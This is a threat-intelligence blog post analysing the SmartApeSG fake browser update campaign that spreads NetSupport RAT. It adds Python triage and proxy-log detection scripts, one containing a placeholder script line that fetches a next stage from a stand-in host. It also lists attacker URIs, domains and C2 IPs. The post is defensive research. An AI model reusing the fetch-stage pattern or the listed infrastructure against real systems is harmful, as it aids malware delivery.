SmartApeSG | by Jonathan Mccay | Walmart Global Tech Blog | Medium

SmartApeSG

Jonathan Mccay
Walmart Global Tech Blog
Oct 26, 2023

By: Jonathan McCay

SmartApeSG (also tracked as ZPHP and HANEYMANEY) is a threat actor that uses fake browser updates to distribute NetSupport RAT. It is often confused with SocGholish because it uses a similar-looking infection chain and fake update lure. When Trellix¹ first reported the earlier techniques used by this group, the activity was unattributed. The name SmartApeSG was given after researchers noticed that this threat actor consistently hosts its infrastructure on the SmartApe ASN and, like SocGholish, delivers malicious JavaScript through fake browser updates.

Site Inject:

A script tag injected into a compromised site loads the first-stage script from the threat actor's infrastructure. The compromised site itself serves only the injected tag; everything that follows is fetched from the actor's servers.

Compromised Site Inject

Minlen.php:

minlen.php is responsible for browser validation and payload delivery. A JavaScript payload is returned only if the request carries an acceptable Referer (the visitor arrived from a compromised site) and the browser, as identified server-side (typically from the User-Agent), is one of the targeted ones (Firefox, Chrome, or Edge). The practical consequence for analysts is that fetching minlen.php directly from a sandbox or with curl, without a matching Referer and browser User-Agent, yields no payload; replays of the URL need both headers set.

Javascript Payload — (delivered by Minlen.php)

The JavaScript payload delivered by minlen.php constructs the iframe used to display the fake update lure. That same payload also loads another script on the same server (qzwewmrqqqqnaww.php) to retrieve the HTML shown inside the iframe.

Old JavaScript payload

An older sample of the JavaScript payload delivered by minlen.php shows an iframe being built to display the content returned by zwewmrqqqqnaww.php.

Older javascript payload

Updated javascript payload

The latest version of this script adds a further layer of obfuscation but appears to perform the same function.

Obfuscated javascript payload

qzwewmrqqqqnaww.php — Retrieve HTML:

Returns the HTML for the lure, which embeds the JavaScript-bearing “update.zip” as a base64-encoded string.

Base64 encoded .zip

Chrome Lure (Fake Update):

SmartApeSG — Fake Update

Javascript — “Update”:

If the user clicks the “Update Chrome” button, the embedded .zip is base64-decoded in the browser and written to the host as a download; it contains a JavaScript file. Because the archive is carried inside the lure HTML rather than fetched separately, there is no distinct HTTP request for update.zip to look for in proxy logs; the lure HTML response is the artifact to capture.

Extracted .zip
Update_browser_10.6336.js
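Because the zip travels inside the lure HTML as base64, an analyst holding a captured qzwewmrqqqqnaww.php response can recover the script without ever clicking the button. The following is an added example, not code from the post or from the actor: it builds a constructed stand-in lure (a tiny zip containing a file named Update_browser_10.6336.js, as in the sample above, with a one-line placeholder script), locates base64 runs that decode to a zip (the "PK" local-file-header magic always encodes to "UEs"), lists the script-like members, and pulls any URLs out of them. The lure markup, the JavaScript variable name, the placeholder script body and the example.invalid URL are assumptions.

```python
import base64
import io
import re
import zipfile

SCRIPT_EXTS = (".js", ".jse", ".vbs", ".wsf", ".hta")
# Base64 of a zip always begins "UEs" (the "PK" local-file-header magic, encoded).
B64_ZIP_RE = re.compile(r"UEs[A-Za-z0-9+/]{20,}={0,2}")


def _build_sample_lure() -> str:
    """Constructed stand-in for the lure HTML returned by qzwewmrqqqqnaww.php.
    The zip member name matches the post's sample; the script body, the markup and
    the variable name are placeholders (assumptions), not the real lure."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(
            "Update_browser_10.6336.js",
            'var r = new ActiveXObject("MSXML2.XMLHTTP");'
            'r.open("GET", "https://example.invalid/cdn/help.php", false);',
        )
    blob = base64.b64encode(buf.getvalue()).decode()
    return (
        '<html><body><button onclick="dl()">Update Chrome</button>'
        f'<script>var u = "{blob}";</script></body></html>'
    )


SAMPLE_LURE_HTML = _build_sample_lure()


def extract_embedded_zips(html: str) -> list:
    """Return the raw bytes of every base64 run in `html` that decodes to a zip."""
    zips = []
    for m in B64_ZIP_RE.finditer(html):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError: bad padding or alphabet
            continue
        if raw[:4] == b"PK\x03\x04":
            zips.append(raw)
    return zips


def list_scripts(zip_bytes: bytes) -> dict:
    """Map member name -> decoded text for every script-like member of the zip."""
    scripts = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(SCRIPT_EXTS):
                scripts[info.filename] = zf.read(info).decode("utf-8", "replace")
    return scripts


def triage_lure(html: str) -> dict:
    """Count embedded zips, name their script members, and collect URLs they contain."""
    result = {"zips": 0, "scripts": {}, "urls": []}
    for raw in extract_embedded_zips(html):
        result["zips"] += 1
        for name, body in list_scripts(raw).items():
            result["scripts"][name] = len(body)
            result["urls"].extend(re.findall(r"https?://[^\s\"'<>]+", body))
    return result


if __name__ == "__main__":
    print(triage_lure(SAMPLE_LURE_HTML))
```

Run it against a saved lure response instead of SAMPLE_LURE_HTML to get the dropped script and its next-stage URL (help.php in this chain) without detonating anything; the "UEs" prefix check plus the magic-byte check after decoding keeps random base64 in the page (fonts, images) from being mistaken for the payload.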

If the JavaScript is executed (on Windows a double-clicked .js file runs under Windows Script Host, wscript.exe, by default), it contacts another script (help.php) to retrieve and execute a PowerShell command.

help.php

The PowerShell returned by help.php creates a Run key value under HKCU for persistence, contacts another script (111.php) to download and decode the NetSupport binaries, and then executes them.

Powershell — Download & Execute

111.php

Returns a base64-encoded .zip of the NetSupport binaries. Once the PowerShell has decoded and extracted it, the command completes the infection by launching the NetSupport client.

Netsupport:

Netsupport — Client32.ini
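The NetSupport client reads its gateway from client32.ini, so the decoded 111.php archive is where the C2 indicators for this stage come from. The following is an added example, not code from the post: it builds a constructed stand-in for the base64 body 111.php returns (a zip holding a placeholder client32.exe, not a real binary, and a client32.ini), decodes it, parses the [HTTP] section for the gateway values and port, and defangs them for reporting in the style the post uses. The sample ini uses the post's listed NetSupport IP and domain as gateway values; that placement, the Port value, the [General] section and the GatewayAddress/SecondaryGateway key names in the sample are assumptions, not read from the actor's actual file.

```python
import base64
import configparser
import io
import zipfile


def _build_sample_response() -> str:
    """Constructed stand-in for the base64 body 111.php returns (an assumption)."""
    ini = (
        "[General]\n"
        "; illustrative section, not the real configuration\n"
        "[HTTP]\n"
        "GatewayAddress=94.158.244.118\n"
        "SecondaryGateway=sdjfnvnbbz.pw\n"
        "Port=443\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("client32.exe", b"MZ placeholder, not the real binary")
        zf.writestr("client32.ini", ini)
    return base64.b64encode(buf.getvalue()).decode()


SAMPLE_111_RESPONSE = _build_sample_response()


def decode_response(b64_body: str) -> bytes:
    """Base64-decode the 111.php body and confirm it is a zip before going further."""
    raw = base64.b64decode(b64_body)
    if raw[:2] != b"PK":
        raise ValueError("111.php body did not decode to a zip archive")
    return raw


def netsupport_config(zip_bytes: bytes) -> dict:
    """Pull the gateway hosts and port out of client32.ini inside the archive."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        members = zf.namelist()
        ini_name = next((m for m in members if m.lower().endswith("client32.ini")), None)
        ini_text = zf.read(ini_name).decode("utf-8", "replace") if ini_name else ""
    # NetSupport's ini is plain INI; lenient parsing so odd keys do not abort triage.
    cp = configparser.ConfigParser(allow_no_value=True, strict=False, interpolation=None)
    cp.read_string(ini_text)
    gateways, port = [], None
    if cp.has_section("HTTP"):
        for key in ("GatewayAddress", "SecondaryGateway"):
            value = cp["HTTP"].get(key)
            if value:
                gateways.append(value.strip())
        port = cp["HTTP"].get("Port")
    return {
        "members": members,
        "gateways": gateways,
        "port": port,
        "has_client32_exe": any(m.lower().endswith("client32.exe") for m in members),
    }


def defang(indicator: str) -> str:
    """Bracket the last dot, e.g. 94.158.244.118 -> 94.158.244[.]118, as in the post's IOC lists."""
    head, _, tail = indicator.rpartition(".")
    return f"{head}[.]{tail}" if head else indicator


def report(b64_body: str) -> list:
    """Defanged gateway indicators recovered from a 111.php response body."""
    cfg = netsupport_config(decode_response(b64_body))
    return [defang(g) for g in cfg["gateways"]]


if __name__ == "__main__":
    print(report(SAMPLE_111_RESPONSE))
```

Feed `report()` the raw body captured from 111.php (or the decoded zip to `netsupport_config()`) to get the gateway hosts to block and hunt for; the presence of client32.exe alongside the ini is what distinguishes this drop from a benign NetSupport install package only when combined with the delivery chain above.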

URI & Script Names

/cdn-js/wds.min.php
/cdn-js/wds-main.php
/cdn/zwmrqqgqnaww.php
/cdn/qzwewmrqqgqnaww.php
/cdn/zwewmrqqgqnaww.php
/cdn-js/minlen.php
/cdn-vs/minlen.php
/cdn/help.php
/cdn/91c818ee6e9ec29f8c1.php
/cdn/xxx.php
/cdn/www.php
/assets/js/css.js
/cgi-bin.js
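The chain described above (the injected script tag, the referrer- and browser-gated minlen.php, the lure HTML script, then help.php after the dropped JavaScript runs) leaves a recognizable sequence in web proxy logs. The following is an added example, not code from the post: it walks constructed proxy log lines, matches request paths against the URI list above and hosts against a subset of the SmartApeSG domains listed in this post (defanging removed), flags a minlen.php hit whose Referer is a different site (the compromised site), and raises a chain alert when the same client hits minlen.php and then help.php within a window. The log format, the client IPs, timestamps and user-agents, the "*.example" site names and the 30-minute window are assumptions; paths on the list that the post does not explain are reported only as "listed".

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# URI paths exactly as listed in the post's "URI & Script Names" section.
SMARTAPESG_PATHS = {
    "/cdn-js/wds.min.php", "/cdn-js/wds-main.php", "/cdn/zwmrqqgqnaww.php",
    "/cdn/qzwewmrqqgqnaww.php", "/cdn/zwewmrqqgqnaww.php", "/cdn-js/minlen.php",
    "/cdn-vs/minlen.php", "/cdn/help.php", "/cdn/91c818ee6e9ec29f8c1.php",
    "/cdn/xxx.php", "/cdn/www.php", "/assets/js/css.js", "/cgi-bin.js",
}
# Roles the post describes; every other listed path is reported as "listed" only.
ROLE = {
    "/cdn-js/minlen.php": "gate", "/cdn-vs/minlen.php": "gate",
    "/cdn/zwmrqqgqnaww.php": "lure", "/cdn/qzwewmrqqgqnaww.php": "lure",
    "/cdn/zwewmrqqgqnaww.php": "lure", "/cdn/help.php": "stage2",
}
# A subset of the SmartApeSG domains from the post, defanging removed.
SMARTAPESG_DOMAINS = {
    "cdespto.org", "seyishalom.com", "baroksmig.online", "cheetahsnv.com",
    "clubcamporico.com", "altiordp.com", "webull.art", "gamefllix.com",
}
CHAIN_WINDOW = timedelta(minutes=30)  # assumed maximum gap between gate hit and help.php

# Constructed proxy log (tab-separated: time, client, method, url, referer, user-agent).
# Client IPs, timestamps, user-agents and the "*.example" sites are invented.
SAMPLE_LOG = """\
2023-10-20T14:02:11\t10.0.0.5\tGET\thttps://shop.example/\t-\tMozilla/5.0 Chrome/118
2023-10-20T14:02:12\t10.0.0.5\tGET\thttps://cdespto.org/cdn-js/minlen.php\thttps://shop.example/\tMozilla/5.0 Chrome/118
2023-10-20T14:02:13\t10.0.0.5\tGET\thttps://cdespto.org/cdn/qzwewmrqqgqnaww.php\thttps://shop.example/\tMozilla/5.0 Chrome/118
2023-10-20T14:05:40\t10.0.0.5\tGET\thttps://cdespto.org/cdn/help.php\t-\tMozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
2023-10-20T14:09:02\t10.0.0.7\tGET\thttps://seyishalom.com/cdn-js/minlen.php\thttps://news.example/\tMozilla/5.0 Firefox/118
2023-10-20T14:30:00\t10.0.0.9\tGET\thttps://cdn.example/cdn/help.php\t-\tcurl/8.0
"""


def parse_line(line: str) -> dict:
    ts, client, method, url, referer, ua = line.split("\t")
    u = urlsplit(url)
    return {"ts": datetime.fromisoformat(ts), "client": client, "method": method,
            "host": (u.hostname or "").lower(), "path": u.path, "referer": referer, "ua": ua}


def classify(rec: dict):
    """One finding per request whose path is on the list, else None."""
    if rec["path"] not in SMARTAPESG_PATHS:
        return None
    role = ROLE.get(rec["path"], "listed")
    ref_host = urlsplit(rec["referer"]).hostname if rec["referer"] != "-" else None
    return {
        "ts": rec["ts"], "client": rec["client"], "host": rec["host"], "path": rec["path"],
        "role": role,
        "known_host": rec["host"] in SMARTAPESG_DOMAINS,  # path-only hits are weaker evidence
        "referer_host": ref_host,
        # The gate is reached from the compromised site, so its Referer is another host.
        "cross_site_referer": role == "gate" and ref_host is not None and ref_host != rec["host"],
    }


def detect(log_text: str) -> dict:
    """Per-request findings plus per-client chain alerts (gate followed by help.php)."""
    findings = []
    for line in log_text.splitlines():
        if line.strip():
            f = classify(parse_line(line))
            if f:
                findings.append(f)
    by_client = defaultdict(list)
    for f in findings:
        by_client[f["client"]].append(f)
    chains = {}
    for client, fs in by_client.items():
        for g in (f for f in fs if f["role"] == "gate"):
            for s in (f for f in fs if f["role"] == "stage2"):
                if timedelta(0) <= s["ts"] - g["ts"] <= CHAIN_WINDOW:
                    chains[client] = {"gate_host": g["host"], "compromised_site": g["referer_host"],
                                      "stage2_ts": s["ts"].isoformat()}
    return {"findings": findings, "chains": chains}


if __name__ == "__main__":
    out = detect(SAMPLE_LOG)
    for f in out["findings"]:
        print(f["client"], f["role"], f["host"] + f["path"], "known" if f["known_host"] else "path-only")
    print("chains:", out["chains"])
```

The chain alert is the high-confidence signal: a gate hit alone can be a user who was served the lure but never clicked, while a lone /cdn/help.php on an unlisted host (10.0.0.9 in the sample) is a generic path that needs the host or the rest of the chain to be meaningful. The Referer host on the gate hit is the compromised site to notify or block.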

HKCU — Run Key

DIVX
DIVXX

SmartApeSG:

cdespto[.]org
seyishalom[.]com
baroksmig[.]online
cheetahsnv[.]com
clubcamporico[.]com
altiordp[.]com
bigbirdmarketing[.]com
ponraj[.]com
magydostravel[.]com
itsdigitalshiva[.]com
cristinaamaro[.]com
ccescpolace[.]com
kororo[.]com
fablane[.]com
amazonascash[.]com
residencialcasabrasileira[.]com
profille-cex-io[.]com
nilselsholz[.]com
credit-volta[.]com
aflomusic[.]com
webull[.]art
zahrajoulaei[.]tech
domaintestss[.]xyz
pixelbase[.]com
krafttopia[.]net
voluntarismo[.]com
kalista-posh[.]com
polyfieldgallery[.]com
seosuccesslab[.]com
offshorechain[.]org
lucyflix[.]com
mypersonalprojectdomain[.]com
marcborowy[.]com
faseries[.]com
manxheu[.]online
lintingdaun[.]com
invertirenmercados[.]com
impulsehorizon[.]com
datavortexllc[.]com
manchhd32ss[.]fun
tidaysdeals[.]online
mangoairsoft[.]com
kevinsmithson[.]com
xxxmir[.]info
phimnhanh[.]info
configuratorpro[.]com
eastrenclouds[.]com
antiqueglossary[.]com
boka-rem[.]com
mansaentertainment[.]com
loloalexander[.]com
gnavigatio[.]com
arauas[.]com
gamefllix[.]com

SmartApeSG — Netsupport:

94.158.244[.]118
94.158.247[.]23
185.163.46[.]93
5.252.178[.]48
5.252.177[.]214
5.252.177[.]126
sdjfnvnbbz[.]pw

References

1: https://www.trellix.com/about/newsroom/stories/research/new-techniques-of-fake-browser-updates/
